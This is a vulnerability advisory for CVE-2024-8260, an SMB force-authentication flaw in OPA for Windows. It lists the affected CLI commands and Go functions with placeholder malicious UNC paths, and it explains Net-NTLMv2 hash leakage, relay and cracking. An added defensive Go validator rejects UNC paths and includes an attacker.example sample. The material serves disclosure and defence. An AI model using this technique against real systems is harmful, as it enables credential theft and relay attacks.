
OPA SMB Force-Authentication

Medium

Synopsis

An SMB force-authentication vulnerability exists in all versions of OPA for Windows prior to v0.68.0. The vulnerability exists because of improper input validation, allowing a user to pass an arbitrary SMB share instead of a Rego file as an argument to the OPA CLI or to one of the OPA Go library’s functions.

This vulnerability requires one of the following:

  • An initial foothold in the environment or social engineering of a user, leading to the execution of the OPA CLI, passing a UNC to the attacker’s server as a Rego rule or bundle path CLI argument.
    • Affected OPA CLI commands:
      • opa eval -d <malicious_UNC_path>
      • opa eval --bundle <malicious_UNC_path>
      • opa run -s <malicious_UNC_path>
  • Passing a UNC to the attacker’s server as a Rego rule or bundle path argument to a vulnerable function in the OPA Go package. This package is used in various Go-based services that integrate OPA, so those services may also be impacted. The likelihood and ease of exploitation are greatly increased if the vulnerable function gets its input from the user or a third party, especially if the affected platform is internet facing.
    • Affected OPA Go package functions:
      • Rego.Load(<malicious_UNC_path>, nil)
      • Rego.LoadBundle(<malicious_UNC_path>)

A successful exploit of this vulnerability can lead to unauthorized access by leaking the Net-NTLMv2 hash of the user currently logged into the Windows device running the OPA application, provided the victim can initiate outbound Server Message Block (SMB) traffic over port 445. Post-exploitation, the attacker can either relay authentication to other systems that support NTLMv2, or perform offline cracking to extract the password.
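As an added defensive example (written for this page, not code from the advisory or from the OPA project), the following Go pre-check is the kind of input validation a service embedding the OPA Go package could run on a caller-supplied rule or bundle path before handing it to Rego.Load or Rego.LoadBundle: it rejects every spelling of a UNC path and confines the path to a local policy directory, so an argument can no longer make the loader open a network share. The function names and the allowedRoot directory are assumptions for the example.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// Sentinel errors so callers can distinguish the two rejection reasons.
var (
	ErrRemotePath  = errors.New("remote (UNC) policy path rejected")
	ErrOutsideRoot = errors.New("policy path outside allowed policy directory")
)

// isUNCPath reports whether p names a Windows network location. Slashes are
// normalised first, so "//host/share", `\\host\share`, `\\?\UNC\host\share` and `\\.\...` are all caught.
func isUNCPath(p string) bool {
	return strings.HasPrefix(strings.ReplaceAll(p, `\`, "/"), "//")
}

// validatePolicyPath returns the cleaned path if p is local and lies under
// allowedRoot (an assumed deployment-specific directory such as C:\opa\policies);
// otherwise it returns ErrRemotePath or ErrOutsideRoot. Run it on every
// user- or third-party-supplied path before calling Rego.Load / Rego.LoadBundle.
func validatePolicyPath(allowedRoot, p string) (string, error) {
	if isUNCPath(p) {
		return "", ErrRemotePath
	}
	root := filepath.Clean(allowedRoot)
	full := filepath.Clean(p)
	if !filepath.IsAbs(full) {
		full = filepath.Join(root, full)
	}
	rel, err := filepath.Rel(root, full)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrOutsideRoot
	}
	return full, nil
}

func main() {
	// Constructed sample inputs: a legitimate local rule, a traversal attempt,
	// and the UNC shape the advisory describes (hostname is a placeholder).
	for _, p := range []string{"authz.rego", "../../Windows/win.ini", `\\attacker.example\share\p.rego`} {
		full, err := validatePolicyPath("/opa/policies", p)
		fmt.Printf("%-36q -> %q, %v\n", p, full, err)
	}
}
```

Blocking outbound TCP/445 at the host or network edge remains the complementary control, since it stops the authentication attempt even if a path check is bypassed.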
 

Solution

Upgrade to v0.68.0 or later.

Disclosure Timeline

June 19, 2024 - Vulnerability discovered.
August 6, 2024 - Tenable discloses issue to Styra.
August 6, 2024 - Styra acknowledges report.
August 26, 2024 - Tenable requests status update from Styra.
August 27, 2024 - Styra provides status update and states that a fix is ready to go and will be part of the next OPA release that will be published later this week.
August 29, 2024 - Tenable provides attribution information and CVE identifier and requests exact publication date from Styra.
August 29, 2024 - Styra sends a link to their already published release.

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

CVE ID: CVE-2024-8260
Tenable Advisory ID: TRA-2024-36
Credit:
Shelly Raban
CVSSv3 Base / Temporal Score:
6.1 / 5.6
CVSSv3 Vector:
AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L
Affected Products:
OPA CLI for Windows (community edition and Enterprise edition) prior to v0.68.0
OPA Go Package running on Windows systems prior to v0.68.0
Risk Factor:
Medium

Advisory Timeline

August 30, 2024 - Initial release.